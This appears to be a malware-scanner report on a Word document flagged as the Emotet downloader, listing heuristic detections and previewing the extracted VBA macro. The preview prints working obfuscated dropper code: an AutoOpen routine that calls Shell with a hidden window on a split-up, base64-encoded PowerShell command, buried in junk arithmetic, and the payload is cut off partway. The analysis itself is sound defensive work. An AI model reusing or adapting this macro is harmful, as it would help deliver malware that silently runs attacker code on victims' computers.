MALICIOUS
242
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7012579-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7012579-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13268 bytes |
SHA-256: 367685e79fd368abc0edc92f3373ab4e17f029cdb5d1a81b79c63aeb419c8269 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uidtZjtuEvuHL" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function UGPrUi() On Error Resume Next LIZJT = fszSMs - Cos(UiYKt) * 1 - Chr(53999) / 62881 - ChrB(rmmir) MTjht = 2817 zCaMh = rrDCMV - Cos(zaGFBF) * 1 - Chr(38728) / 15561 - ChrB(WnbbV) ZTlSq = 26524 UGPrUi = uWhHqd + ItBRskvULqu + QjAHmSzhT + hWTvlJKk + AdUFLjSvUOM + CfDBBA + lMHquMnhC jwwMu = UokZMA - Cos(lMbfo) * 1 - Chr(64088) / 84807 - ChrB(fnkFMX) kQtid = 54228 End Function Sub Autoopen() On Error Resume Next IGpLin = mNObFh - Cos(sFiJV) * 1 - Chr(87583) / 2737 - ChrB(NGhRC) TfiWn = 83927 NVBBswfbQK (UGPrUi) UpdCE = sZWiHq - Cos(sLPVI) * 1 - Chr(66644) / 85756 - ChrB(tjdNka) ijERq = 17022 End Sub Function NVBBswfbQK(UvKjoI) On Error Resume Next QAGRu = krbZb - Cos(MIPMOF) * 1 - Chr(98171) / 11822 - ChrB(GzpTYZ) pZqzwU = 90035 OrokN = HEmnO - Cos(STqLr) * 1 - Chr(5206) / 92892 - ChrB(ARzWi) CBibBr = 25398 zjdzjSIuw = Shell(TKAuaZDAG + Chr(vbKeyP) + JIXsVtFRbT + UvKjoI, vbHide) wWROt = wvCjJ - Cos(YVjiI) * 1 - Chr(87339) / 46824 - ChrB(OwtRBT) FVKlXw = 34298 End Function Attribute VB_Name = "TucJWLFOQM" Function uWhHqd() On Error Resume Next DBCoP = InFaz - Cos(OANld) * 1 - Chr(57892) / 49672 - ChrB(ljswwo) ELFAHZ = 73196 wBmzXzVMw = "owersHe" + "LL -Wi" + "nDowsTyle hi" + "dden -" + "e KAAo" + "ACgAIgB" + "7ADIAMwB9AHsAO" + "AAxAH0" dJVMi = Omwvp - Cos(CXdOD) * 1 - Chr(43325) / 21856 - ChrB(WIFrb) DbAap = 58032 liGVOj = "AewA1" + "ADcAfQB7A" + "DMANQB" + "9AHsANQA" + "1AH0Aew" + "AxADEAfQB" + "7ADEANQB9AHsA" + "NQAxAH0A" cjcHRv = WuvBH - Cos(kjirw) * 1 - Chr(70447) / 26351 - ChrB(BVDik) VmmVF = 22280 iznwjErNf = "ewA4ADAAfQB" + "7ADEANgB" + "9AHsAM" + "gAyAH0Ae" + "wA2ADkAfQB7ADQ" + "AMwB9AHsAN" + "gA3AH0AewA1ADYA" + "fQB7ADYA" aoAGlb = CcMEk - Cos(jWtIi) * 1 - Chr(10166) / 31688 - ChrB(aOYdh) ljIavv = 56194 UtAKsVsD = "NgB9AHsANQA0AH" + "0AewA" + "xADcA" + "fQB7ADQANwB9AHs" + "AMwA4AH0AewA" + "4AH0AewAxADkAf" shkKJ = KYIzu - Cos(awtdrA) * 1 - Chr(90592) / 53468 - ChrB(ZcdEqT) UmIod = 50198 zmkCBU = "QB7ADIANQB" + "9AHsAMw" + "AzAH0AewAyA" + "DgAfQB7ADIANwB9" + "AHsAMQB9AHsANwB" + "9AHsANAAwAH0A" + "ewAzAH0AewA2" LYUvHF = GZjDK - Cos(qfivAB) * 1 - Chr(20145) / 37591 - ChrB(HFTpr) VqFzA = 40278 PwQEw = "ADIAfQB7ADMAM" + "gB9AHsANgA1" + "AH0AewA0ADIAfQB" + "7ADkAfQB7" + "ADcAMgB9AHsANw" + "A4AH0AewAzADEA" EXEnWw = DuAfh - Cos(pDNocP) * 1 - Chr(19582) / 12698 - ChrB(OcSOw) idEJRI = 50553 izTSthQlGLV = "fQB7ADEAMA" + "B9AHsAOAA1AH0Ae" + "wA1ADMAfQB7A" + "DcAMAB9AHsAOAA0" qNfNA = NEnIO - Cos(SdRXk) * 1 - Chr(20702) / 51673 - ChrB(IcVIwi) QwVPT = 28737 NUjnKwBp = "AH0AewAy" + "ADEAfQB" + "7ADcANQB9AH" + "sANwA5" + "AH0AewA4ADYA" XbzCJE = JoKzj - Cos(EMjZG) * 1 - Chr(65391) / 73684 - ChrB(NrWOR) wHSsvA = 50228 KLWdv = "fQB7A" + "DQANgB9AHsAM" + "wA2AH0AewA2" + "ADAAfQB7ADgAM" + "gB9AHsA" + "MwA5AH0Ae" + "wAwAH0A" + "ewAxAD" + "gAfQB7" qZiBW = wnKIPQ - Cos(EQwIl) * 1 - Chr(55053) / 78182 - ChrB(janrW) CWREi = 85249 zZXuvFFTR = "ADUAMAB9AHsAMg" + "A0AH0AewA" + "4ADMAf" + "QB7ADcAMQB9AHsA" + "MQAzAH0AewA3ADQ" uWhHqd = wBmzXzVMw + liGVOj + iznwjErNf + UtAKsVsD + zmkCBU + PwQEw + izTSthQlGLV + NUjnKwBp + KLWdv + zZXuvFFTR End Function Function ItBRskvULqu() On Error Resume Next VGqFLB = ahOwB - Cos(srVjJ) * 1 - Chr(45119) / 72045 - ChrB(HzvJzd) RtEjXR = 65785 SjVuH = "AfQB7ADYANAB" + "9AHsANA" + "A1AH0AewA" + "0ADEAfQB7ADMANA" + "B9AHsANAA0AH" + "0AewA1ADgAfQB7" + "ADUAfQB7ADIA" + "OQB9AHs" + "ANQA5AH0AewA1A" GCaaj = BMoqFO - Cos(AhuLG) * 1 - Chr(4770) / 28395 - ChrB(vwLYI) oJSdA = 20072 jmzqaohFc = "DIAfQ" + "B7ADEAMgB9AH" + "sANAB9AHsA" + "NgAzAH0Ae" + "wA2ADEA" PhjwBN = nGSuP - Cos(QLJVQO) * 1 - Chr(37396) / 4326 - ChrB(GOCba) CWMFD = 55583 VwsSmibAB = "fQB7AD" + "YAOAB9AHsANAA" + "4AH0AewA3ADM" + "AfQB7A" + "DMAMAB9AHsAMg" + "A2AH0AewAyADA" + "AfQB7A" + "DcANgB9AHsAMg ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.